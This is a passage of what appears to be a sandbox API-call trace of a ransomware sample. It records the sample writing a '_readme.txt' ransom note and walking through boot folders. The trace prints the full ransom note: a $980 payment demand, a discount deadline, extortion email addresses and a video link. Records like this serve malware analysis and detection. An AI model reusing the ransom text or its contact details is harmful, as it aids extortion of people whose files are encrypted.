Flags=0x0, Size=0x85d) returned 0x32acff0 [0056.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32acff0, cbMultiByte=2141, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 1118 [0056.335] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x326aa18 [0056.335] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned 1117 [0056.335] WriteFile (in: hFile=0x5c8, lpBuffer=0x326aa18*, nNumberOfBytesToWrite=0x45d, lpNumberOfBytesWritten=0x9f4fb64, lpOverlapped=0x0 | out: lpBuffer=0x326aa18*, lpNumberOfBytesWritten=0x9f4fb64*=0x45d, lpOverlapped=0x0) returned 1 [0056.336] CloseHandle (hObject=0x5c8) returned 1 [0056.336] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326aa18 | out: hHeap=0x660000) returned 1 [0056.337] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5e2e0 | out: hHeap=0x660000) returned 1 [0056.337] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c82710 | out: hHeap=0x660000) returned 1 [0056.337] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.337] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.337] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec76650, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec76650, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.337] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.337] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec76650, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec76650, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.337] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0056.337] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec76650, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec76650, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec76650, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0056.337] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec76650, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec76650, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec76650, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0056.337] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.337] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.337] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eef0 | out: hHeap=0x660000) returned 1 [0056.337] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eef0 [0056.337] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.337] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.337] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.337] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.337] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.337] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.337] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.337] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.338] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.338] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.338] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.338] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.338] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.338] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.338] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.338] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.338] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.338] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.338] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.338] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.338] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.338] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.338] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.338] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.338] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.338] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.338] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.338] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.338] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.338] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.338] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.338] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.338] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.338] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.338] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.338] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.338] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.338] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.338] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.338] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.338] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.339] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.339] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.339] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.339] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.339] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.339] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.339] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.339] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.339] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.339] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.339] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.339] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.339] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.339] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.339] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.339] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.339] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.339] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.339] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.339] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.339] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.339] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.339] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.339] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.339] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.339] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.339] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.339] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.339] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.339] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.339] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.339] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.340] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.340] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.340] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.340] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.340] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.340] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.340] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.340] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.340] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.340] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.340] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.340] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.340] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.340] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.340] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.340] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.340] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.340] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.340] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.340] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.340] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.340] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.340] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.340] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.340] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.340] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.340] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.340] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.340] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.340] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.340] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.340] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.340] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.341] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.341] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.341] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.341] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.341] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.341] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.341] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.341] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.341] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.341] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.341] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.341] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.341] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.341] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.341] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.341] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.341] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.341] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.341] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.341] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.341] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.341] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.341] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.341] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.341] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.341] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.341] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.341] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.341] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.341] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.341] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.341] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.341] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.342] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.342] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.342] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.342] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.342] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.342] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.342] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.342] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.342] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.342] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.342] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.342] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.342] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.342] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.342] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.342] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.342] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.342] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.342] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.342] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.342] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.342] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.342] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.342] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.342] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.342] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.342] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.342] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.342] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.342] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.342] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.342] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.342] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.342] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.343] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.343] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.343] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.343] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.343] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.343] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eec8 | out: hHeap=0x660000) returned 1 [0056.343] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.343] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.343] HeapFree (in: hHeap=0x660000, dwFlags=0x0, 